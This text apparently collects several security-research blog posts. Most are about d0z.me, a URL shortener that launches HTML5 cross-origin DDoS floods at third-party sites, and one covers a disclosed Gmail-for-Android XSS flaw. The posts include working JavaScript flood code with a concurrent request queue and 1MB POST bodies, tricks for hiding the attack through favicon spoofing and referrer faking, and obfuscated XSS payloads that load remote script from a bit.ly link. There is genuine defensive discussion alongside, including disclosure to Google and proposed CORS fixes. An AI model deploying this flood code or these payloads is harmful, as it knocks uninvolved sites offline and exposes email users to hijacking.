Well, here we are, about three months after I initially released d0z.me, and I've finally gotten away from school and life for a bit this week and updated it. I think it was definitely worth the wait, though. You can grab the code over at d0z.me's new Google Code repository, and see it in action here.
Beyond making the backend code a little bit less of a disaster than it was originally, I have also made the attack itself significantly more effective. For the impatient among you, I will summarize the changes here:
- More efficient web worker implementation for making the requests.
- Some cosmetic changes that make it less obvious that an attack is occurring.
- Switched to POST requests by default, which allow us to hold server threads longer and exhaust a target's bandwidth.
- Lots of updates to the backend code.
Before I go on though, I'd like to send another big THANK YOU to Lavakumar Kuppan over at andlabs.org for his research, feedback, and suggestions. His research was what originally inspired d0z.me, and he has given me several very useful suggestions on how to improve it. Go follow the andlabs blog. Also, thank you to everyone else who has sent in bug reports, suggestions, etc. since I released it. You rock.
Web Worker Changes
My original implementation of the HTML5 DDoS attack did its job well, but was not exactly polished. I had some ideas for speed improvements even at the time, but hadn't spent much time optimizing. As it was, it opened four web workers, each of which made only one request at a time. This produced good results, but was very processor intensive for Firefox users, and at times wasted valuable time waiting for a response from the server. I was also unable to recreate the results from Lava's original presentation (although this later turned out to be due to a flaw in my testing procedure).
After I released d0z.me, Lava contacted me and suggested instead that I run one web worker and launch many simultaneous requests. Obviously, running multiple requests at a time is much more efficient. With some slight modifications to the pseudocode he provided (to ensure a full request queue is maintained), I was able to achieve slightly better speeds, using only two web workers instead of four.
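Conceptually, the worker ends up looking something like this (a minimal sketch of the full-queue idea rather than the actual d0z.me source; the queue depth and message format here are arbitrary):

```javascript
// worker.js -- sketch of the full-queue approach described above.
var MAX_PENDING = 20;  // simultaneous in-flight requests to maintain (arbitrary)
var pending = 0;

function flood(target) {
    // Top the queue back up to MAX_PENDING outstanding requests.
    while (pending < MAX_PENDING) {
        var xhr = new XMLHttpRequest();
        pending++;
        xhr.onreadystatechange = function () {
            if (this.readyState === 4) {  // request finished, slot freed
                pending--;
                flood(target);            // immediately refill the queue
            }
        };
        // Random query string defeats caching; the CORS denial only stops us
        // from reading the response, not from sending the request.
        xhr.open('GET', target + '?' + Math.random(), true);
        xhr.send();
    }
}

onmessage = function (e) {
    flood(e.data);  // the main page posts the target URL to the worker
};
```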
Originally, d0z.me also implemented an attack almost identical to that of JSLOIC, meaning that it constantly reloaded an image in the background. While this added a few extra requests per second, it was rather insignificant compared to its HTML5 counterpart, could only perform GET requests, and had the serious downside of displaying a progress bar in some browsers. Because of this, it has now been removed. In addition, d0z.me now attempts to pull the embedded site's favicon and present it as its own, so as to appear more legitimate. With these two changes, the URL becomes the only way to tell the embedded site and d0z.me apart in most browsers.
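The favicon swap itself is trivial; something along these lines does the job (a sketch, where targetOrigin is a hypothetical variable holding the embedded site's origin):

```javascript
// Sketch: point this page's favicon at the embedded site's icon so the tab
// looks like the target. targetOrigin is hypothetical, e.g. "http://example.com".
var link = document.createElement('link');
link.rel = 'shortcut icon';
link.href = targetOrigin + '/favicon.ico';
document.getElementsByTagName('head')[0].appendChild(link);
```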
Using POST Requests for Attack Amplification
Advantages of the POST Attack
One limitation of the original d0z.me implementation was that it could do little to consume bandwidth. In addition, while it was able to overwhelm servers with the sheer number of requests, it did not hold server threads for very long. This meant that it took a decent number of users to significantly affect performance (whether by consuming all available threads, crashing the database, or the like). Bandwidth and thread exhaustion are both commonly used DDoS techniques, so why can't we do the same with HTML5 DDoS? Well, it turns out, we can!
While the original version of d0z.me used GET requests, we can also make POST requests via CORS. We can issue roughly the same number of requests per second as with GET, meaning that in most situations, even without a payload, the effect will be similar. However, POST gives us a number of advantages that GET does not.
Unlike with the previous version, however, attackers don't need to find large files on the host in order to exhaust its bandwidth. Apache effectively doesn't cap request body size out of the box (the LimitRequestBody directive defaults to unlimited and can be set as high as 2GB), so we can send quite sizable requests safely. Most configurations do, in fact, set a lower limit, but we can still send decently large requests regardless. To ensure that it works on most hosts, d0z.me's attack is set to use a 1MB request body. In practice, this is more than sufficient to generate excessive amounts of traffic.
Beyond the bandwidth advantages, we also tie up server threads for much longer, as the host must receive the entire request body before it can respond. While this isn't a "slow POST" style attack like Slowloris, it has a similar effect: tying up processing threads that must receive the overly large requests, thereby slowing response times drastically.
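In sketch form, the POST flood looks something like the following (illustrative only; the ~1MB figure is the default mentioned above, everything else is arbitrary):

```javascript
// Sketch of the POST variant: each completed request immediately launches
// a replacement, keeping a ~1MB body in flight as often as possible.
var body = new Array(1024 * 1024).join('A');  // roughly 1MB of filler

function post(target) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function () {
        if (this.readyState === 4) post(target);  // slot freed, fire again
    };
    xhr.open('POST', target + '?' + Math.random(), true);  // bust caches
    // text/plain keeps this a CORS "simple request" -- more on that below
    xhr.setRequestHeader('Content-Type', 'text/plain');
    xhr.send(body);
}
```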
F*ckin' CORS, How Does It Work?
So what hosts does this affect, you might ask? Just CORS-enabled hosts, right? Wrong.
The CORS working draft defines a series of steps that a browser should go through when attempting to make a cross-origin request. First, it should check its cache to see if it has connected to this URL within the cache timeout period, and if it has, whether or not cross-origin requests were allowed on that URL. If they were, it can go ahead and make the request; if not, the request process should stop there. If the URL is not in the cache, the draft states that the browser should make a "pre-flight request": essentially an empty OPTIONS request that fetches the headers for that particular URL to see what is allowed. The exception to this rule, however, is when the request is a "simple request", i.e., a GET, HEAD, or POST (for POST, only with a simple content type such as text/plain or application/x-www-form-urlencoded). Simple requests skip the preflight entirely: the browser sends the full request, body and all, and only checks afterwards whether the page is allowed to read the response. By the time any denial happens, the server has already received and processed the request, which is why any host can be attacked this way, CORS-enabled or not.
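To make the distinction concrete (the victim URL and custom header here are just placeholders):

```javascript
// A "simple" cross-origin POST: no preflight, the body goes straight out.
// The server receives and processes it even if it never opted into CORS;
// the browser merely refuses to let the page read the response.
var simple = new XMLHttpRequest();
simple.open('POST', 'http://victim.example/', true);
simple.setRequestHeader('Content-Type', 'text/plain');  // simple content type
simple.send('payload');

// A non-simple request: the custom header forces an OPTIONS preflight first,
// and if the server doesn't approve, the real request is never sent at all.
var guarded = new XMLHttpRequest();
guarded.open('POST', 'http://victim.example/', true);
guarded.setRequestHeader('X-Custom-Header', '1');  // triggers the preflight
guarded.send('payload');
```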
I considered adding HTTP referrer / origin obfuscation support, which I previously demonstrated was possible. However, as my goal is not to make d0z.me impossible to detect and block, and I still want people to be able to find the site if abuse occurs, I decided against it. I think it is sufficient that I have warned multiple times against relying on those headers to block attacks; that's a band-aid, not a fix. I also considered adding IE support, but the attack is significantly slower without the benefit of web workers. When IE adds support for web workers, I will attempt to add support for it.
I have left GET requests in as an option, although I believe it is usually the less effective one. However, a GET attack may work better if a host disallows all POST requests, or if a.) CORS is enabled on the URL and b.) responding to the request causes the host to do a significant amount of processing. The GET attack also uses significantly less memory on machines viewing the link, which might be a consideration in some instances.
As I said earlier, it's been three months since I released d0z.me. As far as I can tell, all it has achieved is a GTFO message from Dreamhost and a decent number of complaint emails. I do like to think that it has raised awareness of some of the problems with URL shorteners and HTML5, but no browsers have attempted to limit the number of XHRs that can be made in a given time period (except *maybe* Safari?), and no changes have been made to the CORS working draft. This needs to be fixed.
While I do find a lot of the issues involved here interesting, my main reason for making this new release is to again encourage browser developers and those working on the CORS draft to fix this problem, and to do it quickly. I hope it will also be useful to administrators for gauging their systems' susceptibility to these attacks, as well as for coming up with defenses against them.
During a night of drinking a couple months ago, I got into a discussion with my roommate (his personal blog, cause I promised) about what characters are valid in email addresses. Although many filters only allow [a-zA-Z0-9_-], plus maybe a few more, as valid characters in the local-part of the address, I was convinced that I had previously seen email addresses using characters outside that set, as well as filters that allowed for a wider range of characters. As I normally do during bouts of drinking, I immediately consulted the relevant RFC (RFC 5322) to settle the dispute. Sure enough, it is apparently allowed, though discouraged, under the RFC to have an email address in the following format: "i<3whate\/er"@mydomain.com. As long as the quotation marks are present, it is technically a valid email address.
Seeing that this might trip up the ill-informed, I decided to see if Gmail handled this case correctly. I wrote up a quick test in Python and used one of the many open SMTP relays on campus (another rant for another time) to shoot an email at my Gmail account. While the main Gmail interface handled the problem with relative ease (there were some small pattern matching issues when replying), I was a little surprised to see something like the following when I opened the email on my phone:
However, this email got blocked by Gmail's spam filters. Although at first I thought they might be aware of the vulnerability and had tried to mitigate it, it quickly became apparent that the filter was simply blocking all emails with "<" in the From address. Weird, but not a showstopper. To get around this, I used the fact that the XSS was present in the image tag and abused the onload attribute for execution:
" onload='var f=String.fromCharCode;var d=document;var s=d.createElement(f(83,67,82,73,80,84));s.src=f(47,47,66,73,84,46,76,89,47,105,51,51,72,100,86);d.getElementsByTagName(f(72,69,65,68))[0].appendChild(s);' "@somedmn.com
With the String.fromCharCode obfuscation decoded, that's equivalent to:
" onload='var d=document;var s=d.createElement("SCRIPT");s.src="//BIT.LY/i33HdV";d.getElementsByTagName("HEAD")[0].appendChild(s);' "@somedmn.com
Sure enough, the email got through, and when viewed, I ended up looking at Google!
Of course, this is in all likelihood not the best way I could have done this, but it worked well. I'd love to see better solutions if people have them.
EDIT: Here's a much cleaner and simpler version, courtesy of R (see comments). I especially liked the use of an attribute for storing the URL string.
" title='http://bit.ly/i33HdV' onload='d=document;(s=d.createElement(/script/.source)).src=this.title;d.getElementsByTagName(/head/.source).appendChild(s)' "@somedmn.com
Probably the easiest way to exploit this vulnerability would be to launch a phishing attack that redirects users to a fake mobile Gmail login page, in the hopes that they will happily log in to continue viewing their email. Simple though it may be, however, that isn't a particularly interesting or creative use of the vulnerability.
One must also keep in mind that, beyond these vulnerability-specific threats, the flaw allowed for much easier (and quieter) exploitation of other vulnerabilities found by other researchers, including the data-stealing bug and various arbitrary code execution vulnerabilities in WebKit (like this). It would also have allowed for the exploitation of any number of file format bugs that might have been found in the future. Exploiting any of these would be as easy as getting a user to open an email. Worse, the user would have no idea until it was too late, as one could set the From header appropriately to make the email look legitimate (i.e., to something other than Test :P):
I found the bug on 12/3/2010, and I contacted Google about 24 hours after I discovered it and confirmed it was exploitable. I received a quick initial response, but patching of the vulnerability on the server side was not completed until 1/28/11, apparently because of decreased staffing levels over the holiday. The patch was applied server-side in the Gmail API, and works by converting the special characters into their corresponding HTML entities. The Google security people were, as in all my previous communications with them, polite and professional, and I want to thank them for addressing the issue in a reasonable timeframe.
Overall, it was a pretty interesting vulnerability, and it was a good opportunity for me to learn a little more about Android. I had a good time familiarizing myself with the platform, and hopefully I will be able to do some more interesting things with it in the future. It has also definitely made me think twice before I open emails on my phone, which is probably for the best. Hopefully once these platforms mature, we won't see as many of these simple but serious vulnerabilities. However, if the maturation process we've observed in other security domains is any indication, I wouldn't hold my breath. It's going to take time.
Note that the malicious nature of the link is only obvious for demonstration reasons. Simply putting a legitimate URL in front of the malicious payload would hide it from the user.
To those wondering where I've been the past month or so, I have been busy IRL getting set up at grad school, among other things. As this blog mainly documents whatever research I'm doing, the amount I post is directly related to the time I have to mess with things. I promise, updates to d0z.me are coming soon, as well as my first Android vulnerability (yay!), and then whatever I feel like posting on after that. It's good to be back!
I'm a big believer in being up front and loud about security vulnerabilities and software bugs that are found, so I want to first and foremost tell anyone using the d0z.me source code to grab an updated version. I have to apologize, as I really had not expected this site to get anywhere near as popular as quickly as it did, and so I had not spent a ton of time testing it before I put it into production. This is a sadly common mistake that the worst of us tend to fall into :-/ . As it happens, one of the regexes I was using in a sanitization routine did not function correctly, allowing for XSS and SQL injection via a specially crafted URL. The hole was patched quickly, and no significant user data was taken (as I keep none), but I wanted to make sure everyone knew in case they're running their own versions. Props to the person on Reddit who pointed out the flaw to me. I'm not sure who it was, as the post has since been deleted, but props all the same.
Secondly, a minor bug: a reader named Max pointed out that I had mistyped a couple of characters in my charset. I should have used Python's string.letters + string.digits, but oh well. Thanks for the report!
Now, onto happier / more interesting topics!
DNS Blacklisting
An oldie, but a goodie. Long used to fight malware, this approach mitigates malicious shorteners by simply changing their DNS entries to redirect users to a warning page. It was interesting to see that, within a day of release, d0z.me was already being blocked by OpenDNS. That's an impressive response time, though given that the site was posted all over Slashdot and Reddit before it got blocked, I suspect the response was quicker than it would usually be.
I'm not going to spend much space discussing this one because, rather obviously, it is not a feasible technique in the long run; it hasn't been particularly effective against malware either. Attackers can register domains more quickly than they can be blocked, and not all DNS providers offer such a defense for their users in the first place. However, it is a decent first line of defense on the user's end, and will at least block the more popular and older malicious URL shorteners.
HTTP Referrer + mod_rewrite
Some smart people have been discussing the use of mod_rewrite (or similar) to block these attacks by redirecting based on the HTTP referrer (interested readers can find an excellent write-up at jaymill.net). Although it's an interesting approach that might deter the casual attacker, I see a couple of big problems with it.
First, I took the liberty of writing up a PoC demonstrating that, using a hidden iframe, one can make attacks like d0z.me appear to have a different referrer address (spareclockcycles.org). You can view it at http://d0z.me/poc_refer.html (note: this link attacks example.com, which should be local). If you look at the requests in Wireshark, you can see that the Origin and HTTP Referrer headers are set to spareclockcycles.org and spareclockcycles.org/evil.html, respectively.
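The mechanics are roughly as follows (a sketch of the idea, not the exact poc_refer.html source):

```javascript
// Outer page (e.g. d0z.me/poc_refer.html): load the actual attack code in a
// hidden iframe hosted on a different origin. XHRs issued from inside the
// frame carry that origin's Origin/Referrer values, not the shortener's.
var frame = document.createElement('iframe');
frame.style.display = 'none';
frame.src = 'http://spareclockcycles.org/evil.html';  // the XHR loop lives here
document.body.appendChild(frame);
```

Since an attacker can host the framed page on any domain they control (or rotate through many of them), filtering on the referrer only blocks the laziest version of the attack.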
This was tested in both Firefox and Chrome, and the behavior conforms to what the working draft has to say on the topic. Some browsers might be non-compliant, but the big two apparently aren't.
Secondly, while this mitigates the attack somewhat, it simply raises the bar for how many users an attacker needs to recruit through clicks on malicious links. Enough traffic will still overwhelm the server: valid connections are still being fully established, and some level of processing still has to be done on each request.
I believe Jeremy mentioned both of these issues, to some degree, in his post, and seemed to consider them of small enough concern not to really matter. I have to respectfully disagree on that point. Yes, this raises the bar slightly for an attacker, but in the long run it proves very little hindrance to anyone with any level of technical ability. It is certainly a good recommendation for those currently under attack; however, I think we need a more solid approach to this issue in the long run, one that addresses it with a complete solution rather than with temporary band-aids.
Changing Cross-Origin Request Standards
It is clear to me that if we want a real fix, this problem is going to have to be addressed on both ends, servers and browsers alike.
As things stand, a browser has no way to remember that a server wants nothing to do with cross-origin requests, so it will happily keep sending them. This seems silly at first glance, but it is actually a side-effect of the fact that different files/directories on the same site can have different cross-origin policies (i.e., you can make specific files cross-origin accessible by adding the proper header only when responding to requests for those files). The browser doesn't want to cache a denial for the entire site when it's possible that some of the content could be allowed. So here is our problem: how do we remember cross-origin denials for sites that have no such content, while still allowing sites to have differing policies for different sections?
My first thought was to modify the standards to require any site that services cross-origin requests in any capacity to include an "Allows-Cross-Origin" header in all of its responses to cross-origin requests. This way, if a browser makes a cross-origin request to a server and doesn't see this header, it can cache the denial for a certain period of time before allowing any further requests to be sent, assured that there is no cross-origin content available on that server. This would mitigate the attack for a large portion of servers, as most have little reason to allow cross-origin requests in the first place. For those that do need to provide this service, it might be advisable for browsers to begin rate-limiting cross-origin requests, so as to minimize the potential effectiveness of this attack on those sites as well. There is no valid reason I can think of for a browser to need to make 10,000 cross-origin requests a minute, so why let it?
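For what it's worth, here is a rough sketch of what the browser-side half of that scheme might look like (entirely hypothetical; neither the header nor this behavior exists in any current standard):

```javascript
// Hypothetical browser logic: cache cross-origin denials per origin when the
// proposed "Allows-Cross-Origin" header is absent from a server's responses.
var denialCache = {};                 // origin -> timestamp of cached denial
var DENIAL_TTL = 60 * 60 * 1000;      // e.g., remember a denial for an hour

function shouldSendCrossOrigin(origin) {
    var deniedAt = denialCache[origin];
    // If the origin recently failed to advertise the header, don't even
    // put the request on the wire until the cache entry expires.
    return !(deniedAt && Date.now() - deniedAt < DENIAL_TTL);
}

function recordResponse(origin, headers) {
    if (!('Allows-Cross-Origin' in headers)) {
        denialCache[origin] = Date.now();  // server opted out entirely
    }
}
```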
This is by no means the only solution to this problem, however, and I would love to hear what other ideas people have on the matter. I very well could have overlooked a much more simple and effective fix, or missed problems with my own.
As I mentioned earlier, d0z.me was simply something I hacked together in a few hours for research purposes (and, of course, fun). This, unfortunately, led to code that is really not up to anyone's standards, including mine, as I was more concerned with testing the attack than with writing good code. I also did not experiment much with the best ways to exploit the HTML5 cross-origin approach, as I was planning to do more of that after I released the tool. I have been in discussion with the researcher who originally reported on this problem, Lavakumar Kuppan, who very kindly helped identify a number of places where my code could be improved.
Because of all this, I am working on a more secure, reliable, and effective PoC, written in Django for the Google App Engine. Keeping both spareclockcycles.org and d0z.me running has put a real strain on my server, so it will be nice to move half the load into the cloud. This release will also hopefully include some significant refinements to the stealth and speed of the DoS. It will probably be delayed until after the holidays, though, as I want to give concerned parties some time to come up with fixes for this issue before releasing a more potent tool, as well as give myself some time to make sure I get things right.
I know I promised @sanitybit that I would have some stats on d0z.me today, but sadly, this post has already gotten way too long, and I'd like to spend some quality time poking around with the numbers. However, some quick stats: at the time of this writing, I've had ~30,000 page views (14,000 unique visitors) on the d0z.me domain and ~19,000 page views (16,000 unique visitors) on spareclockcycles.org since Sunday. Definitely not bad, especially for someone who is used to having visitor counts in the tens...
But yeah, welcome to all my readers! More interesting statistics are still coming, so come back soon.